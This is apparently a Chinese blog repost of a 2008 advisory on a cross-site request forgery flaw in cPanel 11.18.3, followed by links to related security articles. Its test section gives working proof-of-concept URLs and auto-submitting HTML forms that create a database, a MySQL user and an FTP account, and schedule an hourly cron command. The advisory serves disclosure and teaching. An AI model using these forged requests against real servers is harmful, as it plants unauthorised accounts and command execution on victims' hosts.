cPanel跨站请求伪造漏洞

最新推荐文章于 2023-11-02 16:59:13 发布
最新推荐文章于 2023-11-02 16:59:13 发布
阅读量1.2k 收藏
点赞数
文章标签: input action 数据库 security database command
发布日期:2008-04-28
更新日期:2008-05-05

受影响系统:
cPanel cPanel 11.18.3 build ID 21703
描述:
CVE(CAN) ID: CVE-2008-2043

cPanel是基于web的工具,用于自动化控制网站和服务器。

cPanel没有验证用户通过HTTP请求所执行的某些操作,这允许远程攻击者通过跨站请求伪造(XSRF)攻击执行仅有管理员才可以执行的操作,包括创建新的数据库、添加新用户等。

<*来源:Rook Security
  
  链接: http://secunia.com/advisories/30027/
         http://www.kb.cert.org/vuls/id/584089
         http://www.rooksecurity.com/blog/?p=7
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

创建数据库:
http://localhost:2082/frontend/x2/sql/adddb.html?db=database_name

创建新的mysql用户:
http://localhost:2082/frontend/x2/sql/adduser.html?user=badmin&pass=badmin

添加ftp用户:
<html>
<form id=1 method=’post’ action=’ http://localhost:2082/frontend/x2/ftp/doaddftp.html’>
<input name=’login’ value=’badmin’>
<input name=’password’ value=’badmin’>
<input name=’quota’ value=’unlimited’>
<input name=’homedir’ value=’/badmin’>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>

每小时运行一次命令行:
<html>
<form id=2 method=’post’ action=’ http://localhost:2082/frontend/x2/cron/editcronsimple.html’>
<input name=’command1′ value=’echo test’>
<input name=’mailto’ value=’junk_address’>
<input name=’minute1′ value=’0′>
<input name=’hour1′ value=’*'>
<input name=’day1′ value=’*'>
<input name=’weekday1′ value=’*'>
<input name=’month1′ value=’*'>
</form>
</html>
<script>
document.getElementById(2).submit();
</script>

cnbird2008
关注
渗透测试面试题
千寻的博客
12-31 11万+
渗透测试面试题 一.思路流程 1.信息收集 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等 扫描网站目录结构,爆后台,网站banner,测试文件,...
17-2 信息收集 - 端口
最新发布
weixin_43263566的博客
12-19 1025
知道目标开放的端口和对应的版本信息,就可以针对性的寻找漏洞,对后期的渗透很有帮助。nmap是一款跨平台的开源端口扫描器,在安全渗透领域具有强大的功能.版本扫描(速度有点慢,我等了快两分钟)
虚拟主机管理公司cPanel被黑 用户数据泄露
weixin_33713503的博客
07-03 171
近日,虚拟主机管理公司cPanel承认被黑,已通知用户其信息或已被泄露。   百科:cPanel cPanel虚拟主机管理系统可以让您的网站和服务器管理更加简单,它成功克服了Linux操作系统图像化界面不够优秀的缺点,给您提供一个非常友好的功能强大的界面。您可以通过简单的图形界面轻松管理您的服务器和服务器上的网站,而不必再为记忆大量的、繁琐的Linux...
cPanel XSS漏洞分析研究(CVE-2023-29489)
蚁景网安学院
05-04 1012
cPanel 是一套在网页寄存业中最享负盛名的商业软件,是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件;提供了足够强大和相当完整的主机管理功能,诸如:Webmail 及多种电邮协议、网页化 FTP 管理、SSH 连线、数据库管理系统、DNS 管理等远端网页式主机管理软件功能。
代码审计——DVWA CSRF(跨站请求伪造
z1756227332的博客
03-06 412
LOW等级代码 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass...
PHP代码审计CSRF 跨站请求伪造
一生无悔惜缘的博客
07-25 652
一.CSRF  是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF  可以做什么? 你这可以这么理解 CSRF 攻击: 攻击者盗用了你的身份,以你的名义发送恶意请求 。 CSRF 能够做的事情包括:以你名义发送邮件,发消息,
每日漏洞 | 跨站请求伪造
03-12 887
HTTP的无状态性,导致Web应用程序必须使用会话机制来识别用户。一旦与Web站点建立连接(访问、登录),用户通常会分配到一个Cookie,随后的请求,都会带上这个Cookie,这样Web站点就很容易分辨请求来自哪个用户,该修改哪个用户的数据。如果从第三方发起对当前站点的请求,该请求也会带上当前站点的Cookie。正是这是这个缺陷,导致了CSRF的产生,利用这个漏洞可以劫持用户执行非意愿的操作。
安全策略配置指南:cPanel中的安全设置
cPanel提供了多种安全设置和功能,使得网站管理员能够制定和实施有效的安全策略,降低风险并减少潜在漏洞。 ## cPanel安全设置对网站的影响 cPanel的安全设置对网站的安全性和可靠性有着直接的影响。合理
安服面试点总结
1
02-22 8782
目录 3389无法连接的几种情况 二次注入 报错注入的函数 基于格式错误的报错(xpath语法错误) 基于主键重复错误 堆叠注入 判断出网站的CMS对渗透的意义 一个成熟并且相对安全的CMS,渗透时扫目录的意义? mysql注入点,用工具对目标站直接写入一句话,需要哪些条件? 1.3389无法连接的几种情况 端口没有开放 端口被修改了 被拦截了 没出网(处于内网(需要进行端口转发)) 2.二次注入 恶意数据经过一些转义函数(get_magic_quotes_gpc)的
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9440
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
登录cPanel/WHM/Webmail 出现Internal Server Error 500错误解决办法
weixin_34082854的博客
12-17 239
当你登录cPanel/WHM/Webmail时出现如下错误 这是由于磁盘分区使用率达到100%造成的 查看磁盘分区使用率方法 df -i 解决办法: 联系VPS供应商,增加分区大小 重启服务器即可 转载于:https://blog.51cto.com/stonebird/744302...
目前国内一些Web mail存在的一个安全漏洞
风信子的专栏
02-19 1397
   该Script源于上个世纪(1999年)一次在设置免费email的自动转发时看到一长串的Url时的想法...      看完这篇文章或许你应该赶紧去检查一下你email中的自动转发中有没有别人的email地址:=(  最好不要随便打开别人发给你的HTML文件...   我们知道,国内好些免费email用户登录后的认证都是靠一长串的Url(如我用ShellTools登  录后是"http
Confluence未授权管理用户添加漏洞复现 (CVE-2023-22515)
holyxp的博客
11-02 856
Atlassian Confluence是企业广泛使用的wiki系统。 2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。
linux下分析webmail代码,Atmail Webmail Client多个HTML代码注入漏洞
weixin_42327217的博客
05-13 402
发布日期:2012-01-09更新日期:2012-01-10受影响系统:@Mail Atmail Webmail Client 6.3.4描述:--------------------------------------------------------------------------------BUGTRAQ ID: 51313Atmail是商业化Linux消息传送平台提供者。Atmai...
cPanel X FTP上传
luntan3210的博客
03-13 291
以前做好了网站的,今天想回来捡起了重新开始,结果第一步就忘记怎么做了,一个FTP上传就拦住了,搞了半天,终于弄懂了。下的一个 始终是响应:220,开始没想明白,以为主机名,用户名或者密码错了,试了半天,还是不行,最后还是突然想起来,百度下这个响应到底什么意思。 原来是FTP设置问题,下了个新的FTP上传软件,瞬间就好了,不过又想了想,应该不是软件的问题,
各端口对应的服务及可能出现的安全漏洞
weixin_51047454的博客
03-11 957
端口 服务 说明 21 FTP 主要看是否支持匿名 22 SSH 弱口令爆破 23 telnet 弱口令爆破 80-90 WEB 常见的web漏洞及一些人为管理后台 161 snmp public弱口令 389 ldap 是否为匿名访问 443 openssl 心脏出血及一些web漏洞测试 445 smb 跑弱口令,测试是否有ms_08067等溢出 873 rsync 是否为匿名访问,也可能存在弱口令 1025 RPC NFC匿名访问 1099 jav...
文件包含LFI漏洞Getshell日志文件目录遍历
qq_60115503的博客
05-13 552
文件包含漏洞的出现及危害 文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击者任意控制运行时执行的文件。如果一个文件包含这个漏洞,为了方便起见,经常在开发阶段就实施。由于它经常用于程序开发阶段,所以这就为后来的攻击埋下了伏笔并导致了各种基于文件的攻击。 文件包含漏洞主要是程序员把一些公用的代码写在一个单独的文件中,然后使用其他文件进行包含调用,如果需要包含的文件使用硬编码,一般是不会出现安全问题,但是
先知漏洞奖励
公众号shadow sock7
04-19 714
参考: 附件四:常见漏洞危害及定义(先知计划) 通用漏洞验收及奖励标准 厂商类型 应用名 官网地址 A类厂商 phpMyAdmin https://www.phpmyadmin.net/ A类厂商 Discuz! http://www.discuz.net A类厂商 Wordpress https://zh-cn.wordpress.com/ A类厂商 Django https://www.d...
渗透测试学习笔记
山己见的博客
11-04 5379
本文只做学习用途,严禁利用本文提到的技术进行非法攻击,否则后果自负,本人不承担任何责任。 信息收集 收集域名信息 Whois查询 kali:whois baidu.com 爱站工具网:https://whois.aizhan.com 站长之家:http://whois.chinaz.com VirusTotal:https://www.virustotal.com 备案信息查询 ICP备案查询网:http://www.beianbeian.com 天眼查:http://www.tianyancha.
cPanel控制面板全面指南
"cPanel面板详细说明" cPanel是一款流行的服务器管理工具,尤其在Web托管行业中广泛应用。它提供了一个直观的图形用户界面,使得用户能够轻松地管理他们的网站、域名、电子邮件账户、数据库和其他服务器配置。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值